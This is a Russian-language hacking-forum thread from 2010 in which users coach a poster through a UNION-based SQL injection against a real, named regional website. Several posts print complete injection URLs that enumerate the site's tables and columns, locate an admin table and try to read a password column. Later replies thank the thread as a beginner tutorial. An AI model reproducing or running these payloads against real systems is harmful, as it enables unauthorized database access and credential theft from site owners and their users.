 |
|
06.09.2010, 03:44
|
|
Познающий
Регистрация: 08.03.2007
Сообщений: 57
С нами:
10092885
Репутация:
119
|
|
Спасибо.
|
|
|
06.09.2010, 05:58
|
|
Постоянный
Регистрация: 18.11.2009
Сообщений: 709
С нами:
8674045
Репутация:
214
|
|
Сообщение от J0cker
Ну если я могу получить имена столбцов только через "Char" или "Hax" (Если указывать просто имя таблицы типа "Users" получу ошибку)
Предположил что так же стоит поступить и при выводе инфы. из столбцов.Но увы пока без успешно.
какая версия mysql, может это вообще не mysql и там другие правила, ?
Сообщение от None
это безобразие типо
Код:
CHAR(65,100,109,105,110,83,105,116 ,101)
Менял на Hax(0x5573657273) в надежде что что то изменится но увы не чего не вышло. )), не удивительно, а ты задумывался что будет в этом случае )). Если конвертить 0x5573657273 даже в hex то будет 307835353733363537323733, я уже даже не говорю что будет если это будет Hax.
P.S. намек: зачем хексить хекс... может лучше UNHEX(0x5573657273), а если по правде, то я вам не скажу за всю SQL, вся SQL слишком велика, но MySQL 3 по 5 обожают чистый хекс т.е. 0x5573657273, но в данном случае это не прокатит, по краней мере на моей памяти хекс работал только в where и в функциях
|
|
|
|
06.09.2010, 11:32
|
|
Познающий
Регистрация: 27.02.2010
Сообщений: 33
С нами:
8527516
Репутация:
6
|
|
Сообщение от None
какая версия mysql, может это вообще не mysql и там другие правила, ?
Версия 5.0.54
Ну методом научного тыка пытался что то сделать )).
Просто не могу понять как вывести значение столбца.
Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23,24+from+INFORMATION_SCHEMA.columns+where+table_name=unhex(7573657273)+--+
Так получаю нормальные названия столбцов.Смысла от финта ушами типа Unhex не увидел.
Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,passwd,15,16,17,18,19,20,21,22,23,24+from+unhex(7573657273)+--+
не получается получить строку из столбца passwd и все как только не извращался над ним.
|
|
|
|
06.09.2010, 13:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
J0cker при выборке данных из конкретной таблицы, нельзя писать имя таблици в ascii или hex
select column from 'имя_таблици_в_плавном_виде'
|
|
|
|
06.09.2010, 19:34
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Сообщение от J0cker
Версия 5.0.54
Ну методом научного тыка пытался что то сделать )).
Просто не могу понять как вывести значение столбца.
Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23,24+from+INFORMATION_SCHEMA.columns+where+table_name=unhex(7573657273)+--+
Так получаю нормальные названия столбцов.Смысла от финта ушами типа Unhex не увидел.
Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,passwd,15,16,17,18,19,20,21,22,23,24+from+unhex(7573657273)+--+
не получается получить строку из столбца passwd и все как только не извращался над ним. Так, давайте выведем все таблицы:
Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d0a,benchmark%28400,@o:=CONCAT%28@o,0x0d0a,%28SELECT+concat%28table_schema,0x2E,@i:=table_name%29+from+information_schema.tables+WHERE+table_name%3E@i+order+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
Я там нашёл city_351.admin
Выведем колонки city_351.admin:
Код:
http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646d696e+--+
Вместо 0x61646d696e пишем название таблицы в HEX виде. HEX вид можно получить тут
Вот и всё, таким образом Вы можете выводить колонки таблиц.
|
|
|
|
14.09.2010, 08:49
|
|
Новичок
Регистрация: 28.08.2010
Сообщений: 1
С нами:
8266646
Репутация:
0
|
|
Xоть я в этом деле не шарю, единственная статья в которой все понятно прочитал их около 10, но везде урезками, или фразами не понятные новечкам. Автору распект!!!
|
|
|
|
08.10.2010, 18:54
|
|
Новичок
Регистрация: 15.08.2010
Сообщений: 1
С нами:
8285366
Репутация:
0
|
|
спасибо
|
|
|
|
11.10.2010, 14:07
|
|
Новичок
Регистрация: 10.10.2010
Сообщений: 0
С нами:
8204726
Репутация:
0
|
|
Спасибо за статью,новачкам будет полезно...
|
|
|
|
11.10.2010, 17:59
|
|
Познающий
Регистрация: 04.09.2010
Сообщений: 86
С нами:
8256566
Репутация:
-5
|
|
И не только...
Сообщение от BlackW00D
Спасибо за статью,новачкам будет полезно...
И не только новичкам. Я к примеру кое что новое узнал (мало правда, но всё же)
|
|
|
|
11.10.2010, 18:11
|
|
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами:
11317286
Репутация:
3876
|
|
По-моему, бред подставлять в статье реальный адрес сайта. Это же надо было додуматься до такого...
Читайте лучше полный FAQ по SQL-inj.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
